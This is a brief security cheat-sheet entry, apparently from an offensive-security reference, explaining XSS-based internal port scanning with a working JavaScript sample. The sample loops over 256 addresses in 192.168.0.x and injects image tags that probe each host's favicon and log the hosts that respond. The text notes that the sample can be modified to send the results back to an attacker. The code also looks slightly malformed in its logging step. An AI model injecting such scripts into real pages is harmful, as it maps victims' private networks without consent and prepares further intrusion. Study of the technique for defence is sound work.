XSS Port Scanning

Overview #

An attacker which is outside of your internal network can force you to browse a webpage containing malicuous javascript.

This javascript code will scan your internal network and can be modified to send results back to attacker.

Sample Code #

<script>
  for (let i = 0; i < 256; i++) {
    let ip = '192.168.0.' + i

    let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">'
    document.body.innerHTML += code
 }
</script>

References #

• https://neonprimetime.blogspot.com/2015/09/cross-site-scripting-xss-that-port-scans.html